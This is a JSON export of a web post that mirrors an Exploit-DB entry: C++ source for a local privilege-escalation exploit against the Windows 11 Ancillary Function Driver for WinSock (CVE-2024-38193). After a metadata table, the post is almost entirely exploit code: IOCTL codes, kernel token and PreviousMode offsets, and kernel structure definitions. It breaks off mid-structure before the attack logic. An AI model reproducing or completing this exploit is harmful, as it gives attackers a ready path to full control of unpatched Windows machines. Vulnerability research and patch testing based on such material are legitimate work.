{"id":3807,"date":"2025-05-09T14:43:21","date_gmt":"2025-05-09T14:43:21","guid":{"rendered":"http:\/\/localhost\/?p=3807"},"modified":"2025-05-09T14:43:21","modified_gmt":"2025-05-09T14:43:21","slug":"microsoft-windows-11-pro-23h2-ancillary-function-driver-for-winsock-privilege-escalation","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=3807","title":{"rendered":"Microsoft Windows 11 Pro 23H2 &#8211; Ancillary Function Driver for WinSock Privilege Escalation"},"content":{"rendered":"<h2>Exploit Details<\/h2>\n<h3>Basic Information<\/h3>\n<table style=\"width:100%; border-collapse: collapse; margin-bottom: 20px;\">\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Exploit Title<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">Microsoft Windows 11 Pro 23H2 &#8211; Ancillary Function Driver for WinSock Privilege Escalation<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Exploit ID<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">EDB-ID:52284<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Type<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">exploitdb<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Published<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">2025-05-09T00:00:00<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Modified<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">2025-05-09T00:00:00<\/td>\n<\/tr>\n<\/table>\n<h3>CVSS Information<\/h3>\n<table style=\"width:100%; border-collapse: collapse; margin-bottom: 20px;\">\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">CVSS Score<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">7.8<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Severity<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd; color: #ff4444; font-weight: bold;\">HIGH<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Vector<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">CVSS:3.1\/AV:L\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:H\/A:H<\/td>\n<\/tr>\n<\/table>\n<h3>CVE Information<\/h3>\n<div style=\" padding: 15px; border: 1px solid #ddd; margin-bottom: 20px;\">\n<ul style=\"margin: 0; padding-left: 20px;\">\n<li>CVE-2024-38193<\/li>\n<\/ul>\n<\/div>\n<h3>Exploit Description<\/h3>\n<div style=\" padding: 15px; border-left: 4px solid #4CAF50; margin-bottom: 20px;\">\nExploit Title: Microsoft Windows 11 Pro 23H2 &#8211; Ancillary Function Driver for WinSock Privilege Escalation Date: 2025-05-05 Exploit Author: Milad Karimi (Ex3ptionaL) Contact:&#8230;\n<\/div>\n<h3>Exploit Code<\/h3>\n<div style=\" color: #d4d4d4; padding: 15px; border: 1px solid #ddd; margin-bottom: 20px; font-family: 'Courier New', monospace; white-space: pre-wrap; overflow-x: auto;\">\n# Exploit Title: Microsoft Windows 11 Pro 23H2 &#8211; Ancillary Function Driver for WinSock Privilege Escalation<br \/>\n<br \/># Date: 2025-05-05<br \/>\n<br \/># Exploit Author: Milad Karimi (Ex3ptionaL)<br \/>\n<br \/># Contact: miladgrayhat@gmail.com<br \/>\n<br \/># Zone-H: www.zone-h.org\/archive\/notifier=Ex3ptionaL<br \/>\n<br \/># Tested on: Win x64<br \/>\n<br \/># CVE : CVE-2024-38193<\/p>\n<p>#pragma once<\/p>\n<p>#include &#8220;ntstatus.h&#8221;<br \/>\n<br \/>#include &#8220;Windows.h&#8221;<br \/>\n<br \/>#include <iostream><\/p>\n<p>#pragma comment(lib, &#8220;ntdll.lib&#8221;)<\/p>\n<p>#define HIDWORD(l) ((DWORD)(((DWORDLONG)(l)>>32)&#038;0xFFFFFFFF))<br \/>\n<br \/>#define LODWORD(l) ((DWORD)((DWORDLONG)(l)))<\/p>\n<p>#define AfdOpenPacket &#8220;AfdOpenPacketXX&#8221;<br \/>\n<br \/>#define AFD_DEVICE_NAME L&#8221;\\\\Device\\\\Afd&#8221;<br \/>\n<br \/>#define LOCALHOST &#8220;127.0.0.1&#8221;<\/p>\n<p>#define IOCTL_AFD_BIND 0x12003LL<br \/>\n<br \/>#define IOCTL_AFD_LISTEN 0x1200BLL<br \/>\n<br \/>#define IOCTL_AFD_CONNECT 0x120BBLL<br \/>\n<br \/>#define IOCTL_AFD_GET_SOCK_NAME 0x1202FLL<br \/>\n<br \/>#define FSCTL_PIPE_PEEK 0x11400CLL<br \/>\n<br \/>#define FSCTL_PIPE_IMPERSONATE 0x11001CLL<br \/>\n<br \/>#define FSCTL_PIPE_INTERNAL_WRITE 0x119FF8<\/p>\n<p>#define OBJ_CASE_INSENSITIVE 0x00000040<br \/>\n<br \/>#define OBJ_INHERIT 0x00000002<br \/>\n<br \/>#define FILE_OPEN_IF 0x3<br \/>\n<br \/>#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)<\/p>\n<p>#define OFFSET_IN_TOKEN_VARIABLEPART 0x490<br \/>\n<br \/>#define OFFSET_IN_TOKEN_TOKEN_PRIVILEGES 0x40<br \/>\n<br \/>#define OFFSET_IN_TOKEN_PRIMARY_GROUP 0xA8<br \/>\n<br \/>#define OFFSET_IN_TOKEN_DYNAMIC_PART 0xB0<br \/>\n<br \/>#define OFFSET_IN_TOKEN_DEFAULT_DACL 0xB8<br \/>\n<br \/>#define PREVIOUS_MODE_OFFSET 0x232<br \/>\n<br \/>#define OFFSET_TO_ACTIVE_PROCESS_LINKS 0x448<br \/>\n<br \/>#define OFFSET_TO_TOKEN 0x4b8<br \/>\n<br \/>#define CURRENT_THREAD (HANDLE)0xFFFFFFFFFFFFFFFE<\/p>\n<p>typedef struct IO_STATUS_BLOCK<br \/>\n<br \/>{<br \/>\n<br \/>    union<br \/>\n<br \/>    {<br \/>\n<br \/>        DWORD Status;<br \/>\n<br \/>        PVOID Pointer;<br \/>\n<br \/>    };<\/p>\n<p>    DWORD* Information;<br \/>\n<br \/>};<\/p>\n<p>\/\/0x4 bytes (sizeof)<br \/>\n<br \/>struct _SYSTEM_POWER_STATE_CONTEXT<br \/>\n<br \/>{<br \/>\n<br \/>    union<br \/>\n<br \/>    {<br \/>\n<br \/>        struct<br \/>\n<br \/>        {<br \/>\n<br \/>            ULONG Reserved1 : 8; \/\/0x0<br \/>\n<br \/>            ULONG TargetSystemState : 4; \/\/0x0<br \/>\n<br \/>            ULONG EffectiveSystemState : 4; \/\/0x0<br \/>\n<br \/>            ULONG CurrentSystemState : 4; \/\/0x0<br \/>\n<br \/>            ULONG IgnoreHibernationPath : 1; \/\/0x0<br \/>\n<br \/>            ULONG PseudoTransition : 1; \/\/0x0<br \/>\n<br \/>            ULONG KernelSoftReboot : 1; \/\/0x0<br \/>\n<br \/>            ULONG DirectedDripsTransition : 1; \/\/0x0<br \/>\n<br \/>            ULONG Reserved2 : 8; \/\/0x0<br \/>\n<br \/>        };<br \/>\n<br \/>        ULONG ContextAsUlong; \/\/0x0<br \/>\n<br \/>    };<br \/>\n<br \/>};<\/p>\n<p>\/\/0x4 bytes (sizeof)<br \/>\n<br \/>union _POWER_STATE<br \/>\n<br \/>{<br \/>\n<br \/>    enum _SYSTEM_POWER_STATE SystemState; \/\/0x0<br \/>\n<br \/>    enum _DEVICE_POWER_STATE DeviceState; \/\/0x0<br \/>\n<br \/>};<\/p>\n<p>\/\/0x48 bytes (sizeof)<br \/>\n<br \/>typedef struct _IO_STACK_LOCATION<br \/>\n<br \/>{<br \/>\n<br \/>    UCHAR MajorFunction; \/\/0x0<br \/>\n<br \/>    UCHAR MinorFunction; \/\/0x1<br \/>\n<br \/>    UCHAR Flags; \/\/0x2<br \/>\n<br \/>    UCHAR Control; \/\/0x3<br \/>\n<br \/>    union<br \/>\n<br \/>    {<br \/>\n<br \/>        struct<br \/>\n<br \/>        {<br \/>\n<br \/>            struct _IO_SECURITY_CONTEXT* SecurityContext; \/\/0x8<br \/>\n<br \/>            ULONG Options; \/\/0x10<br \/>\n<br \/>            USHORT FileAttributes; \/\/0x18<br \/>\n<br \/>            USHORT ShareAccess; \/\/0x1a<br \/>\n<br \/>            ULONG EaLength; \/\/0x20<br \/>\n<br \/>        } Create; \/\/0x8<br \/>\n<br \/>        struct<br \/>\n<br \/>        {<br \/>\n<br \/>            struct _IO_SECURITY_CONTEXT* SecurityContext; \/\/0x8<br \/>\n<br \/>            ULONG Options; \/\/0x10<br \/>\n<br \/>            USHORT Reserved; \/\/0x18<br \/>\n<br \/>            USHORT ShareAccess; \/\/0x1a<br \/>\n<br \/>            struct _NAMED_PIPE_CREATE_PARAMETERS* Parameters; \/\/0x20<br \/>\n<br \/>        } CreatePipe; \/\/0x8<br \/>\n<br \/>        struct<br \/>\n<br \/>        {<br \/>\n<br \/>            struct _IO_SECURITY_CONTEXT* SecurityContext; \/\/0x8<br \/>\n<br \/>            ULONG Options; \/\/0x10<br \/>\n<br \/>            USHORT Reserved; \/\/0x18<br \/>\n<br \/>            USHORT ShareAccess; \/\/0x1a<br \/>\n<br \/>            struct _MAILSLOT_CREATE_PARAMETERS* Parameters; \/\/0x20<br \/>\n<br \/>        } CreateMailslot; \/\/0x8<br \/>\n<br \/>        struct<br \/>\n<br \/>        {<br \/>\n<br \/>            ULONG Length; \/\/0x8<br \/>\n<br \/>            ULONG Key; \/\/0x10<br \/>\n<br \/>            ULONG Flags; \/\/0x14<br \/>\n<br \/>            union _LARGE_INTEGER ByteOffset; \/\/0x18<br \/>\n<br \/>        } Read; \/\/0x8<br \/>\n<br \/>        struct<br \/>\n<br \/>        {<br \/>\n<br \/>            ULONG Length; \/\/0x8<br \/>\n<br \/>            ULONG Key; \/\/0x10<br \/>\n<br \/>            ULONG Flags; \/\/0x14<br \/>\n<br \/>            union _LARGE_INTEGER ByteOffset; \/\/0x18<br \/>\n<br \/>        } Write; \/\/0x8<br \/>\n<br \/>        struct<br \/>\n<br \/>        {<br \/>\n<br \/>            ULONG Length; \/\/0x8<br \/>\n<br \/>            struct _UNICODE_STRING* FileName; \/\/0x10<br \/>\n<br \/>            enum _FILE_INFORMATION_CLASS FileInformationClass; \/\/0x18<br \/>\n<br \/>            ULONG FileIndex; \/\/0x20<br \/>\n<br \/>        } QueryDirectory; \/\/0x8<br \/>\n<br \/>        struct<br \/>\n<br \/>        {<br \/>\n<br \/>            ULONG Length; \/\/0x8<br \/>\n<br \/>            ULONG CompletionFilter; \/\/0x10<br \/>\n<br \/>        } NotifyDirectory; \/\/0x8<br \/>\n<br \/>        struct<br \/>\n<br \/>        {<br \/>\n<br \/>            ULONG Length; \/\/0x8<br \/>\n<br \/>            ULONG CompletionFilter; \/\/0x10<br \/>\n<br \/>            enum _DIRECTORY_NOTIFY_INFORMATION_CLASS<br \/>\n<br \/>DirectoryNotifyInformationClass; \/\/0x18<br \/>\n<br \/>        } NotifyDirectoryEx; \/\/0x8<br \/>\n<br \/>        struct<br \/>\n<br \/>        {<br \/>\n<br \/>            ULONG Length; \/\/0x8<br \/>\n<br \/>            enum _FILE_INFORMATION_CLASS FileInformationClass; \/\/0x10<br \/>\n<br \/>        } QueryFile; \/\/0x8<br \/>\n<br \/>        struct<br \/>\n<br \/>        {<br \/>\n<br \/>            ULONG Length; \/\/0x8<br \/>\n<br \/>            enum _FILE_INFORMATION_CLASS FileInformationClass; \/\/0x10<br \/>\n<br \/>            struct _FILE_OBJECT* FileObject; \/\/0x18<br \/>\n<br \/>            union<br \/>\n<br \/>            {<br \/>\n<br \/>                struct<br \/>\n<br \/>                {<br \/>\n<br \/>                    UCHAR ReplaceIfExists; \/\/0x20<br \/>\n<br \/>                    UCHAR AdvanceOnly; \/\/0x21<br \/>\n<br \/>                };<br \/>\n<br \/>                ULONG ClusterCount; \/\/0x20<br \/>\n<br \/>                VOID* DeleteHandle; \/\/0x20<br \/>\n<br \/>            };<br \/>\n<br \/>        } SetFile; \/\/0x8<br \/>\n<br \/>        struct<br \/>\n<br \/>        {<br \/>\n<br \/>            ULONG Length; \/\/0x8<br \/>\n<br \/>            VOID* EaList; \/\/0x10<br \/>\n<br \/>            ULONG EaListLength; \/\/0x18<br \/>\n<br \/>            ULONG EaIndex; \/\/0x20<br \/>\n<br \/>        } QueryEa; \/\/0x8<br \/>\n<br \/>        struct<br \/>\n<br \/>        {<br \/>\n<br \/>            ULONG Length; \/\/0x8<br \/>\n<br \/>        } SetEa; \/\/0x8<br \/>\n<br \/>        struct<br \/>\n<br \/>        {<br \/>\n<br \/>            ULONG Length; \/\/0x8<br \/>\n<br \/>            enum _FSINFOCLASS FsInformationClass; \/\/0x10<br \/>\n<br \/>        } QueryVolume; \/\/0x8<br \/>\n<br \/>        struct<br \/>\n<br \/>        {<br \/>\n<br \/>            ULONG Length; \/\/0x8<br \/>\n<br \/>            enum _FSINFOCLASS FsInformationClass; \/\/0x10<br \/>\n<br \/>        } SetVolume; \/\/0x8<br \/>\n<br \/>        struct<br \/>\n<br \/>        {<br \/>\n<br \/>            ULONG OutputBufferLength; \/\/0x8<br \/>\n<br \/>            ULONG InputBufferLength; \/\/0x10<br \/>\n<br \/>            ULONG FsControlCode; \/\/0x18<br \/>\n<br \/>            VOID* Type3InputBuffer; \/\/0x20<br \/>\n<br \/>        } FileSystemControl; \/\/0x8<br \/>\n<br \/>        struct<br \/>\n<br \/>        {<br \/>\n<br \/>            union _LARGE_INTEGER* Length; \/\/0x8<br \/>\n<br \/>            ULONG Key; \/\/0x10<br \/>\n<br \/>            union _LARGE_INTEGER ByteOffset; \/\/0x18<br \/>\n<br \/>        } LockControl; \/\/0x8<br \/>\n<br \/>        struct<br \/>\n<br \/>        {<br \/>\n<br \/>            ULONG OutputBufferLength; \/\/0x8<br \/>\n<br \/>            ULONG InputBufferLength; \/\/0x10<br \/>\n<br \/>            ULONG IoControlCode; \/\/0x18<br \/>\n<br \/>            VOID* Type3InputBuffer; \/\/0x20<br \/>\n<br \/>        } DeviceIoControl; \/\/0x8<br \/>\n<br \/>        struct<br \/>\n<br \/>        {<br \/>\n<br \/>            ULONG SecurityInformation; \/\/0x8<br \/>\n<br \/>            ULONG Length; \/\/0x10<br \/>\n<br \/>        } QuerySecurity; \/\/0x8<br \/>\n<br \/>        struct<br \/>\n<br \/>        {<br \/>\n<br \/>            ULONG SecurityInformation; \/\/0x8<br \/>\n<br \/>            VOID* SecurityDescriptor; \/\/0x10<br \/>\n<br \/>        } SetSecurity; \/\/0x8<br \/>\n<br \/>        struct<br \/>\n<br \/>        {<br \/>\n<br \/>            struct _VPB* Vpb; \/\/0x8<br \/>\n<br \/>            struct _DEVICE_OBJECT* DeviceObject; \/\/0x10<br \/>\n<br \/>        } MountVolume; \/\/0x8<br \/>\n<br \/>        struct<br \/>\n<br \/>        {<br \/>\n<br \/>            struct _VPB* Vpb; \/\/0x8<br \/>\n<br \/>            struct _DEVICE_OBJECT* DeviceObject; \/\/0x10<br \/>\n<br \/>        } VerifyVolume; \/\/0x8<br \/>\n<br \/>        struct<br \/>\n<br \/>        {<br \/>\n<br \/>            struct _SCSI_REQUEST_BLOCK* Srb; \/\/0x8<br \/>\n<br \/>        } Scsi; \/\/0x8<br \/>\n<br \/>        struct<br \/>\n<br \/>        {<br \/>\n<br \/>            ULONG Length; \/\/0x8<br \/>\n<br \/>            VOID* StartSid; \/\/0x10<br \/>\n<br \/>            struct _FILE_GET_QUOTA_INFORMATION* SidList; \/\/0x18<br \/>\n<br \/>            ULONG SidListLength; \/\/0x20<br \/>\n<br \/>        } QueryQuota; \/\/0x8<br \/>\n<br \/>        struct<br \/>\n<br \/>        {<br \/>\n<br \/>            ULONG Length; \/\/0x8<br \/>\n<br \/>        } SetQuota; \/\/0x8<br \/>\n<br \/>        struct<br \/>\n<br \/>        {<br \/>\n<br \/>            enum _DEVICE_RELATION_TYPE Type; \/\/0x8<br \/>\n<br \/>        } QueryDeviceRelations; \/\/0x8<br \/>\n<br \/>        struct<br \/>\n<br \/>        {<br \/>\n<br \/>            struct _GUID* InterfaceType; \/\/0x8<br \/>\n<br \/>            USHORT Size; \/\/0x10<br \/>\n<br \/>            USHORT Version; \/\/0x12<br \/>\n<br \/>            struct _INTERFACE* Interface; \/\/0x18<br \/>\n<br \/>            VOID* InterfaceSpecificData; \/\/0x20<br \/>\n<br \/>        } QueryInterface; \/\/0x8<br \/>\n<br \/>        struct<br \/>\n<br \/>        {<br \/>\n<br \/>            struct _DEVICE_CAPABILITIES* Capabilities; \/\/0x8<br \/>\n<br \/>        } DeviceCapabilities; \/\/0x8<br \/>\n<br \/>        struct<br \/>\n<br \/>        {<br \/>\n<br \/>            struct _IO_RESOURCE_REQUIREMENTS_LIST*<br \/>\n<br \/>IoResourceRequirementList; \/\/0x8<br \/>\n<br \/>        } FilterResourceRequirements; \/\/0x8<br \/>\n<br \/>        struct<br \/>\n<br \/>        {<br \/>\n<br \/>            ULONG WhichSpace; \/\/0x8<br \/>\n<br \/>            VOID* Buffer; \/\/0x10<br \/>\n<br \/>            ULONG Offset; \/\/0x18<br \/>\n<br \/>            ULONG Length; \/\/0x20<br \/>\n<br \/>        } ReadWriteConfig; \/\/0x8<br \/>\n<br \/>        struct<br \/>\n<br \/>        {<br \/>\n<br \/>            UCHAR Lock; \/\/0x8<br \/>\n<br \/>        } SetLock; \/\/0x8<br \/>\n<br \/>        struct<br \/>\n<br \/>        {<br \/>\n<br \/>            enum BUS_QUERY_ID_TYPE IdType; \/\/0x8<br \/>\n<br \/>        } QueryId; \/\/0x8<br \/>\n<br \/>        struct<br \/>\n<br \/>        {<br \/>\n<br \/>            enum DEVICE_TEXT_TYPE DeviceTextType; \/\/0x8<br \/>\n<br \/>            ULONG LocaleId; \/\/0x10<br \/>\n<br \/>        } QueryDeviceText; \/\/0x8<br \/>\n<br \/>        struct<br \/>\n<br \/>        {<br \/>\n<br \/>            UCHAR InPath; \/\/0x8<br \/>\n<br \/>            UCHAR Reserved[3]; \/\/0x9<br \/>\n<br \/>            enum _DEVICE_USAGE_NOTIFICATION_TYPE Type; \/\/0x10<br \/>\n<br \/>        } UsageNotification; \/\/0x8<br \/>\n<br \/>        struct<br \/>\n<br \/>        {<br \/>\n<br \/>            enum _SYSTEM_POWER_STATE PowerState; \/\/0x8<br \/>\n<br \/>        } WaitWake; \/\/0x8<br \/>\n<br \/>        struct<br \/>\n<br \/>        {<br \/>\n<br \/>            struct _POWER_SEQUENCE* PowerSequence; \/\/0x8<br \/>\n<br \/>        } PowerSequence; \/\/0x8<br \/>\n<br \/>        struct<br \/>\n<br \/>        {<br \/>\n<br \/>            union<br \/>\n<br \/>            {<br \/>\n<br \/>                ULONG SystemContext; \/\/0x8<br \/>\n<br \/>                struct _SYSTEM_POWER_STATE_CONTEXT SystemPowerStateContext;<br \/>\n<br \/>\/\/0x8<br \/>\n<br \/>            };<br \/>\n<br \/>            enum _POWER_STATE_TYPE Type; \/\/0x10<br \/>\n<br \/>            union _POWER_STATE State; \/\/0x18<br \/>\n<br \/>            enum POWER_ACTION ShutdownType; \/\/0x20<br \/>\n<br \/>        } Power; \/\/0x8<br \/>\n<br \/>        struct<br \/>\n<br \/>        {<br \/>\n<br \/>            struct _CM_RESOURCE_LIST* AllocatedResources; \/\/0x8<br \/>\n<br \/>            struct _CM_RESOURCE_LIST* AllocatedResourcesTranslated; \/\/0x10<br \/>\n<br \/>        } StartDevice; \/\/0x8<br \/>\n<br \/>        struct<br \/>\n<br \/>        {<br \/>\n<br \/>            ULONGLONG ProviderId; \/\/0x8<br \/>\n<br \/>            VOID* DataPath; \/\/0x10<br \/>\n<br \/>            ULONG BufferSize; \/\/0x18<br \/>\n<br \/>            VOID* Buffer; \/\/0x20<br \/>\n<br \/>        } WMI; \/\/0x8<br \/>\n<br \/>        struct<br \/>\n<br \/>        {<br \/>\n<br \/>            VOID* Argument1; \/\/0x8<br \/>\n<br \/>            VOID* Argument2; \/\/0x10<br \/>\n<br \/>            VOID* Argument3; \/\/0x18<br \/>\n<br \/>            VOID* Argument4; \/\/0x20<br \/>\n<br \/>        } Others; \/\/0x8<br \/>\n<br \/>    } Parameters; \/\/0x8<br \/>\n<br \/>    struct _DEVICE_OBJECT* DeviceObject; \/\/0x28<br \/>\n<br \/>    struct _FILE_OBJECT* FileObject; \/\/0x30<br \/>\n<br \/>    LONG(*CompletionRoutine)(struct _DEVICE_OBJECT* arg1, struct _IRP*<br \/>\n<br \/>arg2, VOID* arg3); \/\/0x38<br \/>\n<br \/>    VOID* Context; \/\/0x40<br \/>\n<br \/>}IO_STACK_LOCATION;<\/p>\n<p>\/\/0x18 bytes (sizeof)<br \/>\n<br \/>struct _KDEVICE_QUEUE_ENTRY<br \/>\n<br \/>{<br \/>\n<br \/>    struct _LIST_ENTRY DeviceListEntry; \/\/0x0<br \/>\n<br \/>    ULONG SortKey; \/\/0x10<br \/>\n<br \/>    UCHAR Inserted; \/\/0x14<br \/>\n<br \/>};<\/p>\n<p>\/\/0x58 bytes (sizeof)<br \/>\n<br \/>struct _KAPC<br \/>\n<br \/>{<br \/>\n<br \/>    UCHAR Type; \/\/0x0<br \/>\n<br \/>    UCHAR AllFlags; \/\/0x1<br \/>\n<br \/>    UCHAR Size; \/\/0x2<br \/>\n<br \/>    UCHAR SpareByte1; \/\/0x3<br \/>\n<br \/>    ULONG SpareLong0; \/\/0x4<br \/>\n<br \/>    struct _KTHREAD* Thread; \/\/0x8<br \/>\n<br \/>    struct _LIST_ENTRY ApcListEntry; \/\/0x10<br \/>\n<br \/>    VOID* Reserved[3]; \/\/0x20<br \/>\n<br \/>    VOID* NormalContext; \/\/0x38<br \/>\n<br \/>    VOID* SystemArgument1; \/\/0x40<br \/>\n<br \/>    VOID* SystemArgument2; \/\/0x48<br \/>\n<br \/>    CHAR ApcStateIndex; \/\/0x50<br \/>\n<br \/>    CHAR ApcMode; \/\/0x51<br \/>\n<br \/>    UCHAR Inserted; \/\/0x52<br \/>\n<br \/>};<br \/>\n<br \/>\/\/0xd0 bytes (sizeof)<br \/>\n<br \/>struct _IRP<br \/>\n<br \/>{<br \/>\n<br \/>    SHORT Type; \/\/0x0<br \/>\n<br \/>    USHORT Size; \/\/0x2<br \/>\n<br \/>    USHORT AllocationProcessorNumber; \/\/0x4<br \/>\n<br \/>    USHORT Reserved; \/\/0x6<br \/>\n<br \/>    struct _MDL* MdlAddress; \/\/0x8<br \/>\n<br \/>    ULONG Flags; \/\/0x10<br \/>\n<br \/>    union<br \/>\n<br \/>    {<br \/>\n<br \/>        struct _IRP* MasterIrp; \/\/0x18<br \/>\n<br \/>        LONG IrpCount; \/\/0x18<br \/>\n<br \/>        VOID* SystemBuffer; \/\/0x18<br \/>\n<br \/>    } AssociatedIrp; \/\/0x18<br \/>\n<br \/>    struct _LIST_ENTRY ThreadListEntry; \/\/0x20<br \/>\n<br \/>    struct IO_STATUS_BLOCK IoStatus; \/\/0x30<br \/>\n<br \/>    CHAR RequestorMode; \/\/0x40<br \/>\n<br \/>    UCHAR PendingReturned; \/\/0x41<br \/>\n<br \/>    CHAR StackCount; \/\/0x42<br \/>\n<br \/>    CHAR CurrentLocation; \/\/0x43<br \/>\n<br \/>    UCHAR Cancel; \/\/0x44<br \/>\n<br \/>    UCHAR CancelIrql; \/\/0x45<br \/>\n<br \/>    CHAR ApcEnvironment; \/\/0x46<br \/>\n<br \/>    UCHAR AllocationFlags; \/\/0x47<br \/>\n<br \/>    union<br \/>\n<br \/>    {<br \/>\n<br \/>        struct _IO_STATUS_BLOCK* UserIosb; \/\/0x48<br \/>\n<br \/>        VOID* IoRingContext; \/\/0x48<br \/>\n<br \/>    };<br \/>\n<br \/>    struct _KEVENT* UserEvent; \/\/0x50<br \/>\n<br \/>    union<br \/>\n<br \/>    {<br \/>\n<br \/>        struct<br \/>\n<br \/>        {<br \/>\n<br \/>            union<br \/>\n<br \/>            {<br \/>\n<br \/>                VOID(*UserApcRoutine)(VOID* arg1, struct _IO_STATUS_BLOCK*<br \/>\n<br \/>arg2, ULONG arg3); \/\/0x58<br \/>\n<br \/>                VOID* IssuingProcess; \/\/0x58<br \/>\n<br \/>            };<br \/>\n<br \/>            union<br \/>\n<br \/>            {<br \/>\n<br \/>                VOID* UserApcContext; \/\/0x60<br \/>\n<br \/>                struct _IORING_OBJECT* IoRing; \/\/0x60<br \/>\n<br \/>            };<br \/>\n<br \/>        } AsynchronousParameters; \/\/0x58<br \/>\n<br \/>        union _LARGE_INTEGER AllocationSize; \/\/0x58<br \/>\n<br \/>    } Overlay; \/\/0x58<br \/>\n<br \/>    VOID(*CancelRoutine)(struct _DEVICE_OBJECT* arg1, struct _IRP* arg2);<br \/>\n<br \/>\/\/0x68<br \/>\n<br \/>    VOID* UserBuffer; \/\/0x70<br \/>\n<br \/>    union<br \/>\n<br \/>    {<br \/>\n<br \/>        struct<br \/>\n<br \/>        {<br \/>\n<br \/>            union<br \/>\n<br \/>            {<br \/>\n<br \/>                struct _KDEVICE_QUEUE_ENTRY DeviceQueueEntry; \/\/0x78<br \/>\n<br \/>                VOID* DriverContext[4]; \/\/0x78<br \/>\n<br \/>            };<br \/>\n<br \/>            struct _ETHREAD* Thread; \/\/0x98<br \/>\n<br \/>            CHAR* AuxiliaryBuffer; \/\/0xa0<br \/>\n<br \/>            struct _LIST_ENTRY ListEntry; \/\/0xa8<br \/>\n<br \/>            union<br \/>\n<br \/>            {<br \/>\n<br \/>                struct _IO_STACK_LOCATION* CurrentStackLocation; \/\/0xb8<br \/>\n<br \/>                ULONG PacketType; \/\/0xb8<br \/>\n<br \/>            };<br \/>\n<br \/>            struct _FILE_OBJECT* OriginalFileObject; \/\/0xc0<br \/>\n<br \/>            VOID* IrpExtension; \/\/0xc8<br \/>\n<br \/>        } Overlay; \/\/0x78<br \/>\n<br \/>        struct _KAPC Apc; \/\/0x78<br \/>\n<br \/>        VOID* CompletionKey; \/\/0x78<br \/>\n<br \/>    } Tail; \/\/0x78<br \/>\n<br \/>};<br \/>\n<br \/>typedef struct _TA_ADDRESS<br \/>\n<br \/>{<br \/>\n<br \/>    USHORT AddressLength;<br \/>\n<br \/>    USHORT AddressType;<br \/>\n<br \/>    UCHAR Address[1];<br \/>\n<br \/>}TA_ADDRESS;<\/p>\n<p>typedef struct _TRANSPORT_ADDRESS<br \/>\n<br \/>{<br \/>\n<br \/>    LONG TAAddressCount;<br \/>\n<br \/>    TA_ADDRESS Address[1];<br \/>\n<br \/>}TRANSPORT_ADDRESS;<\/p>\n<p>typedef struct _UNICODE_STRING {<br \/>\n<br \/>    USHORT Length;<br \/>\n<br \/>    USHORT MaximumLength;<br \/>\n<br \/>    PWSTR Buffer;<br \/>\n<br \/>} UNICODE_STRING, * PUNICODE_STRING;<\/p>\n<p>typedef struct _OBJECT_ATTRIBUTES<br \/>\n<br \/>{<br \/>\n<br \/>    ULONG Length;<br \/>\n<br \/>    HANDLE RootDirectory;<br \/>\n<br \/>    PUNICODE_STRING ObjectName;<br \/>\n<br \/>    ULONG Attributes;<br \/>\n<br \/>    PVOID SecurityDescriptor;<br \/>\n<br \/>    PVOID SecurityQualityOfService;<br \/>\n<br \/>}OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;<\/p>\n<p>typedef struct _SYSTEM_MODULE_ENTRY<br \/>\n<br \/>{<br \/>\n<br \/>    HANDLE Section;<br \/>\n<br \/>    PVOID MappedBase;<br \/>\n<br \/>    PVOID ImageBase;<br \/>\n<br \/>    ULONG ImageSize;<br \/>\n<br \/>    ULONG Flags;<br \/>\n<br \/>    USHORT LoadOrderIndex;<br \/>\n<br \/>    USHORT InitOrderIndex;<br \/>\n<br \/>    USHORT LoadCount;<br \/>\n<br \/>    USHORT OffsetToFileName;<br \/>\n<br \/>    UCHAR FullPathName[256];<br \/>\n<br \/>} SYSTEM_MODULE_ENTRY, * PSYSTEM_MODULE_ENTRY;<\/p>\n<p>typedef struct _SYSTEM_MODULE_INFORMATION<br \/>\n<br \/>{<br \/>\n<br \/>    ULONG Count;<br \/>\n<br \/>    SYSTEM_MODULE_ENTRY Module[1];<br \/>\n<br \/>} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;<\/p>\n<p>typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX<br \/>\n<br \/>{<br \/>\n<br \/>    PVOID Object;<br \/>\n<br \/>    ULONG_PTR UniqueProcessId;<br \/>\n<br \/>    ULONG_PTR HandleValue;<br \/>\n<br \/>    ULONG GrantedAccess;<br \/>\n<br \/>    USHORT CreatorBackTraceIndex;<br \/>\n<br \/>    USHORT ObjectTypeIndex;<br \/>\n<br \/>    ULONG HandleAttributes;<br \/>\n<br \/>    ULONG Reserved;<br \/>\n<br \/>} SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX;<\/p>\n<p>typedef struct _SYSTEM_HANDLE_INFORMATION_EX<br \/>\n<br \/>{<br \/>\n<br \/>    ULONG_PTR NumberOfHandles;<br \/>\n<br \/>    ULONG_PTR Reserved;<br \/>\n<br \/>    SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[1];<br \/>\n<br \/>} SYSTEM_HANDLE_INFORMATION_EX, * PSYSTEM_HANDLE_INFORMATION_EX;<\/p>\n<p>typedef struct _AFD_CREATE_PACKET {<br 